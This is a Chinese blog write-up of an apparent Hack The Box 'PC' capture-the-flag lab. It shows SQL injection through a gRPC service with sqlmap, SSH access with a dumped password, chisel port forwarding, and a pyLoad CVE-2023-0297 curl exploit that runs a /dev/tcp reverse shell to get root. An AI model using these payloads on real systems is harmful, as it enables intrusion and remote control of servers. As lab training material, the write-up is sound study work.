HTB PC靶机渗透测试流程

最新推荐文章于 2025-02-08 11:46:04 发布
最新推荐文章于 2025-02-08 11:46:04 发布
阅读量368 收藏
点赞数
文章标签: 网络 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/132190332
版权
本文介绍了在HackTheBoxEasy难度的靶机上,通过端口扫描发现gRPC服务,利用SQL注入获取用户凭证,进一步通过SSH登录,然后利用pyLoad的漏洞实现权限提升并执行反弹shell,最终获取root权限的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机介绍

来源:Hack The Box        靶机难度:Easy


信息收集

 

端口扫描

可以发现开放了两个端口,22和50051

sudo nmap -sT --min-rate 10000 -p- 10.10.11.214

版本探测

可以发现22端口版本为OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)

50051仍然无法得知版本号

初步判断操作系统为Ubuntu Linux

sudo nmap -sU --top-ports 100 10.10.11.214

 

UDP扫描

没有新的发现

sudo nmap -sU --top-ports 100 10.10.11.214

 谷歌搜寻信息

通过谷歌搜索得知50051可能是gRPC服务的默认端口号

渗透流程

使用grpcui创建webui

你也可以用grpcurl如果你更喜欢用命令行操作的话

./grpcui -plaintext 10.10.11.214:50051

下载地址

grpcui             grpcurl

 

SQL注入

使用registerUser注册一个账户

 登录获取ID和TOKEN

ID=187
token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVhcmRyb3AiLCJleHAiOjE2OTE1NzkyNzJ9.AifFDaFQ20KOlX6A8_PN86yHoLJGkPw9A51xq9JRA88

 正常getinfo可以成功

尝试在id那里添加一个引号 发现报错了,可能存在SQL注入

 

 使用Sqlmap爆破数据库,拿到用户名密码

sudo sqlmap -r sql --level 5 --risk 3 --dump --batch

 SSH登录

使用账户名sau密码HereIsYourPassWord1431
成功登录到目标靶机

获取user.txt

文件在家目录下

d11969f0ac61815bc832c267d1a90921

 

权限提升

发现可疑端口进程

使用netstat发现开放了8000端口,同时在opt目录下发现app的源码,并且该app是以root权限运行的。

 

 

端口转发

使用chisel进行端口转发
 

./chisel server -p 3477 --reverse # kali机
./chisel client 10.10.14.3:3477 R:8000:127.0.0.1:8000/tcp # 靶机

本地访问 

 访问127.0.0.1:8000发现是pyLoad,通过对比软件源码和谷歌搜寻得知该版本存在远程命令执行漏洞。CVE-2023-0297

 漏洞利用

kali开启监听

sudo python3 -m http.server 7777

准备payload

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"bash%20/home/sau/shell.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://127.0.0.1:8000/flash/addcrypted2'

编写反弹shell.sh,并上传到靶机

sh -i >& /dev/tcp/10.10.14.3/7777 0>&1

 执行获取反弹shell

 获取root.txt

171712d7a82bea4a8b035f94a9293ff4

总结

通过50051的grpc端口服务,配合grpcui得知存在SQL注入漏洞,利用sqlmap获取到用户,并成功登录到ssh,最后利用pyLoad的远程命令执行漏洞getshell并提权。

Teardrop、
关注
对DC-1靶机进行渗透测试
zll___的博客
03-11 1221
对DC-1靶机进行渗透测试
渗透测试靶机:DC-2
m0_70830611的博客
12-18 139
jerry和tom的密码成功爆了出来,对wp-admin进行下登陆。还有个7744端口的ssh可以利用,尝试下这两个用户能否登陆进去。git是以root权限执行的,git也照应了上一个flag的提示。尝试绕过rbash(这里直接借鉴了别人的,但还是不太懂)发现ls能列出home目录,然后还能直接用less查看。得到了三个用户admin、jerry、tom。很明显有个wp-admin的登陆网页。用jerry登陆进去后直接就找到了。jerry没有成功,但tom可以。后面的步骤做的有些云里雾里的。
渗透测试靶机
anquanzushiye的博客
03-20 1237
网站今日更新PPT内容:1.从刑事个案看信息保护与数据利用 https://www.secshi.com/34183.html2.网络空间治理的中国法治...
渗透实战(提高你的实战能力)_渗透测试实战
最新发布
jennycisp的博客
02-08 1252
一、靶机地址下载靶机后,双击用vmware打开。二、靶机渗透1、打开靶场显示的是一个登陆界面。2、看到这个界面,我们不知道账号和密码,先外网打点。使用kali中的端口扫描工具:nmap 判断这个靶场地址的ip地址3、发现存在80端口,我们去通过ip去访问web界面。4、查看一下端口详细信息5、没发现什么其他了。我们现在对它进行目录扫描,看看有没有什么特殊的东西。一个一个去看6、可以输入,尝试尝试。发现了这个,我们去看看txt文件。发现我的输入都被保存在txt文件中了。
靶机渗透测试(HA: NARAK)
@小张小张的博客
10-24 3027
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
靶机渗透测试(Pandavas)
@小张小张的博客
11-01 1224
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy) 目标:Get root! 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 得到靶机ip为:192.168.10.33 2. nmap进行靶机端口服务扫描 命令:nmap -sS -Pn -A -p-
HTB靶场系列 Windows靶机 Arctic靶机
m0_57221101的博客
01-30 2786
这台靶机设定的30秒响应速度真的让人绝望。正儿八经的每做一个动作就可以玩半天手机 勘探 nmap nmap -sS -p 1-65535 10.10.10.11 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST Nmap scan report for 10.10.10.11 Host is up (0.28s latency). Not shown: 65532 filtered ports PORT
HTB靶场系列 Windows靶机 Blue靶机
m0_57221101的博客
01-26 1530
ms17-010漏洞,也就是广为人知的永恒之蓝,非常简单的一个靶机,因为几乎不用提权,ms17-010漏洞使用成功获取的就是system级别的权限 勘探 常规操作 先用nmap扫 nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.40 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:00 EDT Warning: 10.10.10.40 giving up on por
HTB Arctic[ATT&CK模型]writeup系列7
重新启程
02-05 3750
目录 0x00 靶机情况 0x01 ATT&CK ATT&CK能用来干什么? 网空威胁行为体(CyberThreat Actors) ATT&CK模型 TTP的定义 0x02 PRE-ATT&CK 一、Priority Definition(优先级定义) 二、Target Selection(选择目标) 三、Information Gat...
Hack The Box——Sauna
江左盟的博客
05-27 3776
简介 信息收集 使用nmap --min-rate 10000 -T5 -A -p1-65535 10.10.10.175扫描端口及服务发现开启的端口非常的多,如图: 查看web服务各功能及源代码,未发现获得Shell的漏洞,网站时静态的,通过W3layouts生成,如图: 扫描网站目录也未发现有价值的线索,如图: 然后看到389端口和3268端口都运行着ldap服...
hackthebox - fuse( smb渗透 & crackmapexec/rpcclient使用 & SeLoadDriverPrivilege提权)
冬萍子癸水
02-13 921
重点,记得先重启这台靶机,否则别人先前用过了 会导致 提权无法执行。浪费我一小时 1、扫描 C:\root> masscan -p1-65535,U:1-65535 10.10.10.193 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-13 09:27:04 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
对DriftingBlues-6靶机进行渗透测试
zll___的博客
04-20 735
对DriftingBlues-6靶机进行渗透测试
靶机渗透测试(cherry:1)
@小张小张的博客
10-26 1227
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate–Hard) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.
渗透测试系列之靶机渗透
anquan2233的博客
10-11 950
Helpline是一个困难的靶机,知识点涉及EFS解密和ME SDP的多个漏洞,包括XXE漏洞、LFI\任意文件下载漏洞、身份认证绕过漏洞以及远程代码执行漏洞等.通关思维导图。
渗透测试靶机---Kioptrix_Level_1
久恙502的博客
07-19 734
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
渗透测试靶机---Tr0ll
久恙502的博客
10-28 541
渗透测试,打靶经历记录,大佬多多指点,谢谢!
靶机渗透测试(Sumo_Sun*)
@小张小张的博客
09-19 654
靶机渗透测试(Sumo_Sun*): Vulnhub靶机 Sumo_Sun* 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Beginner) 目标:成功渗透进入靶机,得到root shell ,提升至root权限! 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址:192.168.10.22 2. nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶
W34KN3SS靶机渗透测试
weixin_58786230的博客
08-11 473
【代码】W34KN3SS靶机渗透测试
靶机简单渗透测试
KKK_2178的博客
11-22 5605
1.下载靶机Metasploitable2-Linux,下载地址:Metasploitable download | SourceForge.net 2.在虚拟机中打开Kali-Linux和下载好的Metasploitable2-Linux,Metasploitable2-Linux的账号:msfadmin,密码:msfadmin. 3.在靶机中输入指令ifconfig,得到靶机ip 4.返回Kali虚拟机操作 输入指令nmap xxxxx (xxxxx为你靶机的ip)查看靶机端口.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值